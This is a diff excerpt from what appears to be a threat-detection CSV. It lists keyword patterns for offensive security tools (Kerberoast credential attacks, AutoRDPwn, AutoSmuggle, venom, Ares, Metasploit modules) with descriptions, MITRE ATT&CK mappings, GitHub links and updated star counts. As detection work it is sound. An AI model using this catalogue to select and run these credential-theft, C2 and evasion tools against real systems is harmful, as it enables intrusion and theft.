TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*autobloody.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*autobloody-main*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" "*AutoBypass.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*AutoC2.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*AutoC2/All.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" @@ -7418,8 +7563,8 @@ "*AutoC2/Wireless.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*AutoC2/Wordlists*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*AutoCompletionHandlerC2ServerManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*autodiscover/brute.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*autoexploit.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*autodiscover/brute.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*autoexploit.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*autokerberoast.ps1*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autokerberoast_noMimikatz.ps1","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autoKirbi2hashcat.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" @@ -7428,11 +7573,11 @@ "*AutoNSE*","offensive_tool_keyword","autonse","Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmaps most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap. or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html","T1059.001 - T1059.003 - T1059.005 - T1059.006 - T1027 - T1064 - T1086 - T1085","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/m4ll0k/AutoNSE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*autopwn*","offensive_tool_keyword","autopwn","tools for pentester. autopwn is designed to make a pentesters life easier and more consistent by allowing them to specify tools they would like to run against targets. without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well..","T1583 - T1059 - T1216 - T1053 - T1027","TA0002 - TA0008 - TA0003","N/A","N/A","Exploitation tools","https://github.com/nccgroup/autopwn","1","1","N/A","N/A","4","375","102","2019-04-23T09:58:28Z","2015-02-23T08:18:01Z" "*AutoRDPwn*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*AutoSmuggle.csproj*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" -"*AutoSmuggle.exe*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" -"*AutoSmuggle.sln*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" -"*AutoSmuggle-master*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" -"*autostart/ares.desktop*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*AutoSmuggle.csproj*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle.exe*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle.sln*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle-master*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*autostart/ares.desktop*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*autoTGS_NtlmCrack.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autotimeline *","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","0","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*autotimeline.py*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" @@ -7443,32 +7588,32 @@ "*aux/persistence.rc","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*aux/privilege_escalation.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*aux/Start-Webserver.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*auxiliary/crawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*auxiliary/sqli/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*av_hips_executables.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*avast_memory_dump.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*auxiliary/crawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auxiliary/sqli/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*av_hips_executables.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*avast_memory_dump.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*avet-master.zip*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*avflagged.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*avrdude -c usbasp -p m328p -U flash:w:avr.hex*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*avred-main.zip*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"*av-update-urls.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*avred-main.zip*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*av-update-urls.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" "*awesome-cve-poc*","offensive_tool_keyword","POC","list of poc exploitation for nown CVE","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tools","https://github.com/qazbnm456/awesome-cve-poc","1","1","N/A","N/A","10","3159","741","2022-01-04T19:07:43Z","2017-02-02T06:43:14Z" -"*Awesome-Hacking*","offensive_tool_keyword","Awesome-Hacking","A collection of awesome lists for hackers. pentesters & security researchers.","T1566 - T1590 - T1204 - T1210 - T1212 - T1213","TA0002 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github/Awesome-Hacking","1","1","N/A","N/A","10","69633","8680","2023-08-08T10:17:21Z","2016-03-30T15:47:10Z" -"*Awesome-Hacking-Resources*","offensive_tool_keyword","Awesome-Hacking-Resources","A collection of hacking / penetration testing resources to make you better!","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Exploitation tools","https://github.com/vitalysim/Awesome-Hacking-Resources","1","1","N/A","N/A","10","13936","2049","2022-08-22T09:10:41Z","2017-10-10T19:09:18Z" -"*awesome-osint*","offensive_tool_keyword","awesome-osint","A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. publicly available sources (as opposed to covert or clandestine sources)","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/jivoi/awesome-osint","1","1","N/A","N/A","10","14087","2400","2023-09-19T11:25:43Z","2016-11-30T13:26:11Z" -"*awesome-pentest*","offensive_tool_keyword","awesome-pentest","A collection of awesome penetration testing and offensive cybersecurity resources.","T1200 - T1210 - T1213 - T1583 - T1589","TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/enaqx/awesome-pentest","1","1","N/A","N/A","10","19300","4317","2023-09-19T03:06:47Z","2014-08-03T23:13:53Z" -"*awesome-pentest-cheat-sheets*","offensive_tool_keyword","awesome-pentest-cheat-sheets","Collection of cheat sheets useful for pentesting","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/coreb1t/awesome-pentest-cheat-sheets","1","0","N/A","N/A","10","3505","755","2023-08-04T12:41:53Z","2016-11-29T00:00:18Z" +"*Awesome-Hacking*","offensive_tool_keyword","Awesome-Hacking","A collection of awesome lists for hackers. pentesters & security researchers.","T1566 - T1590 - T1204 - T1210 - T1212 - T1213","TA0002 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github/Awesome-Hacking","1","1","N/A","N/A","10","69666","8680","2023-08-08T10:17:21Z","2016-03-30T15:47:10Z" +"*Awesome-Hacking-Resources*","offensive_tool_keyword","Awesome-Hacking-Resources","A collection of hacking / penetration testing resources to make you better!","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Exploitation tools","https://github.com/vitalysim/Awesome-Hacking-Resources","1","1","N/A","N/A","10","13938","2049","2022-08-22T09:10:41Z","2017-10-10T19:09:18Z" +"*awesome-osint*","offensive_tool_keyword","awesome-osint","A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. publicly available sources (as opposed to covert or clandestine sources)","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/jivoi/awesome-osint","1","1","N/A","N/A","10","14096","2404","2023-10-04T14:37:06Z","2016-11-30T13:26:11Z" +"*awesome-pentest*","offensive_tool_keyword","awesome-pentest","A collection of awesome penetration testing and offensive cybersecurity resources.","T1200 - T1210 - T1213 - T1583 - T1589","TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/enaqx/awesome-pentest","1","1","N/A","N/A","10","19309","4319","2023-09-19T03:06:47Z","2014-08-03T23:13:53Z" +"*awesome-pentest-cheat-sheets*","offensive_tool_keyword","awesome-pentest-cheat-sheets","Collection of cheat sheets useful for pentesting","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/coreb1t/awesome-pentest-cheat-sheets","1","0","N/A","N/A","10","3508","755","2023-08-04T12:41:53Z","2016-11-29T00:00:18Z" "*awesome-scapy*","offensive_tool_keyword","awesome-scapy","A Python tool and library for low level packet creation and manipulation","T1571 - T1596 - T1567 - T1569","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/secdev/awesome-scapy","1","1","N/A","N/A","2","148","29","2023-03-08T23:26:41Z","2020-02-04T12:17:35Z" "*awesome-static-analysis*","offensive_tool_keyword","awesome-static-analysis","This is a collection of static analysis tools and code quality checkers","T1064 - T1027 - T1029 - T1518","TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/codefactor-io/awesome-static-analysis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 